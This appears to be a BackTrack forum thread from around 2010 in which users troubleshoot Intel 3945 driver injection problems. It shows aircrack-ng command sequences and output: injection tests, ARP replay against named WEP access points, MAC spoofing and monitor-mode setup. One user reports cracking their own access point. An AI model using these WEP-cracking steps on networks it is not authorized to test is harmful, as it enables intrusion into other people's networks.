Got it to work. Somehow. Followed some references from "iceman_3233" post, played with some vmware settings.
In fact, still can't connect but the ALFA is visible. Wicd manager is stuck at "obtaining ip address" for some time. Then "not connected". While trying anything, the LED on the ALFA is off all the time. But I can see wireless networks.
This turned out to be a great work-around, as the BT4pf 3945 drivers don't work on channels 12-14 and these ones do, so thanks fella.
Thanks to everyone who has contributed towards bt3 and all the other great tools within it, especially shamanvirtuel, spoonwpa is just awesome to a noob like me. Hope you find somewhere to live.
Seriously, this problem is growing long in the tooth. I have searched high and low and tons of people claim that aireplay-ng works fine just using the iwlwifi drivers. The -9 test is the only thing that works for me. The -3 ARP injection functionality does nothing. I try to install the ipwraw setup and it fails on the make. Apparently neither solution works and I could really use some help, especially getting the iwlwifi drivers to properly perform ARP injection. If you're concerned about security and prefer to PM me that's fine but I really need some direction here...
Hello everyone
Same problem here. Same wireless card.
Code:
root@bt:~# sudo lshw -C network
  *-network
       description: Ethernet interface
       product: L1 Gigabit Ethernet Adapter
       vendor: Attansic Technology Corp.
       physical id: 0
       bus info: pci@0000:02:00.0
       logical name: eth0
       version: b0
       serial: 00:1e:8c:29:3b:66
       capacity: 1GB/s
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation
       configuration: autonegotiation=on broadcast=yes driver=atl1 driverversion=2.1.3 firmware=N/A latency=0 link=no multicast=yes port=twisted pair
  *-network
       description: Wireless interface
       product: PRO/Wireless 3945ABG [Golan] Network Connection
       vendor: Intel Corporation
       physical id: 0
       bus info: pci@0000:03:00.0
       logical name: wmaster0
       version: 02
       serial: 00:1c:bf:5e:84:3b
       width: 32 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list logical ethernet physical wireless
       configuration: broadcast=yes driver=iwl3945 ip=XX.XX.XX.XX latency=0 module=iwl3945 multicast=yes wireless=IEEE 802.11abg
Tried it all...
In BT3 ipwraw drivers used to work fine...
In BT4 tried installing them but got errors in the make command.
I tried everything
aireplay-ng -9 wlan0 reports injection capable:
I started to airodump in mon0
Code:
root@bt:~# aireplay-ng -9 wlan0
23:04:24  Trying broadcast probe requests...
23:04:24  Injection is working!
23:04:26  Found 1 AP
23:04:26  Trying directed probe requests...
23:04:26  00:14:7F:71:76:7F - channel: 1 - 'SpeedTouchD53AD3'
23:04:26  Ping (min/avg/max): 1.239ms/8.870ms/95.915ms Power: -86.96
23:04:26  28/30:  93%
aireplay-ng -1 and aireplay-ng -3 in wlan0
I wait for a while and get an ARP packet, it then starts to send thousands of packets but ARP count and Data count remain the same (low)
I've passed through all the steps reported here and still can't get injection...
Code:
root@bt:~# aireplay-ng -3 -b 00:24:B2:79:86:82 -h 00:16:44:F9:7E:32 wlan0
00:26:52  Waiting for beacon frame (BSSID: 00:24:B2:79:86:82) on channel 6
Saving ARP requests in replay_arp-0128-002652.cap
You should also start airodump-ng to capture replies.
Read 46916 packets (got 1 ARP requests and 14 ACKs), sent 189395 packets...(499 pps)
Can anyone help???
Thanks
I have to agree with the above posters. BT3 works very well using the ipwraw drivers on the Intel 3945. BT4 final is at best patchy; you can enable monitor mode, associate and capture but the capture rate is very slow indeed.
We must therefore be patient and wait for an effective update to the BT4 iso to return the lost i3945 functionality.
After you tried an aireplay -3 run could you try a 'dmesg' and see if "rtc timeout" messages are displayed? Because that seems to be the regular problem... Somehow the driver/kernel/whatever does not seem to be able to keep up with the packet rate?
(And offtopic, I also purchased and received a 1W Alpha AWUS036H.. Works perfectly out of the box with BT4!)
Hello there EgWel
This is what I get:
Code:
aireplay-ng -3 -b 00:26:F2:0B:FB:95 -h 00:16:44:F9:7E:32 wlan0

 CH 12 ][ BAT: 1 hour 38 mins ][ Elapsed: 2 mins ][ 2010-02-01 18:40

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:26:F2:0B:FB:95  177 100     1379        2    0  12  54   WEP  WEP         ZON-6322

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

Code:
root@bt:~# aireplay-ng -3 -b 00:26:F2:0B:FB:95 -h 00:16:44:F9:7E:32 wlan0
18:37:55  Waiting for beacon frame (BSSID: 00:26:F2:0B:FB:95) on channel 12
Saving ARP requests in replay_arp-0201-183755.cap
You should also start airodump-ng to capture replies.
Read 4966 packets (got 2 ARP requests and 0 ACKs), sent 53749 packets...(499 pps)

Hope this helps
Code:
root@bt:~# dmesg
ADDRCONF(NETDEV_UP): wlan0: link is not ready
device mon0 entered promiscuous mode
device wlan0 entered promiscuous mode
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
__ratelimit: 62 callbacks suppressed
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
. . .
hpet1: lost 1 rtc interrupts
__ratelimit: 661 callbacks suppressed
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts

P.S.-Thanks for the tip about the Alpha AWUS036H but I'm not about to buy one just to be back at square one the next time another Backtrack version comes out. If this works out for some it should work for all... I Think.....
Update
After EgWel's suggestion I remembered that I had a USB dongle that came with my first router, a Sitecom.
Decided to give it a try and voilà, successfully cracked my AP in 9 min.
Here are some outputs:
Used the same method
Code:
root@bt:~# airmon-ng stop wlan1

Interface       Chipset                 Driver

wlan0           Intel 3945 a/b/g        iwl3945 - [phy0]
wlan1           Ralink 2573 USB         rt73usb - [phy1]
                                (monitor mode disabled)

root@bt:~# ifconfig wlan1 down
root@bt:~# macchanger --mac 00:16:44:F9:7E:32 wlan1
Current MAC: 00:0c:f6:22:08:3b (Sitecom Europe Bv)
Faked MAC:   00:16:44:f9:7e:32 (unknown)
root@bt:~# iwconfig wlan1 rate 1M
root@bt:~# iwconfig wlan1 mode monitor
root@bt:~# iwconfig wlan1 channel 6
root@bt:~# ifconfig wlan1 up
root@bt:~# airmon-ng start wlan1

Interface       Chipset                 Driver

wlan0           Intel 3945 a/b/g        iwl3945 - [phy0]
wlan1           Ralink 2573 USB         rt73usb - [phy1]
                                (monitor mode enabled on mon0)

root@bt:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wmaster0  no wireless extensions.

wlan0     IEEE 802.11abg  ESSID:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Tx-Power=0 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

wmaster1  no wireless extensions.

wlan1     IEEE 802.11bg  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=10 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=10 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

airodump on mon0 and aireplay on wlan1
after first ARP it worked like a charm...
this is the output from dmesg:
the difference between rt73usb and iwl3945 drivers is
Code:
rt73usb 2-4:1.0: firmware: requesting rt73.bin
device mon0 entered promiscuous mode
device wlan1 entered promiscuous mode
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts
hpet1: lost 1 rtc interrupts

instead of:
Code:
t73usb 2-4:1.0: firmware: requesting rt73.bin

Does this point someone in a direction???
Code:
ADDRCONF(NETDEV_UP): wlan0: link is not ready

I would still like to be dongle free and use iwl3945 drivers if I could...
Thanks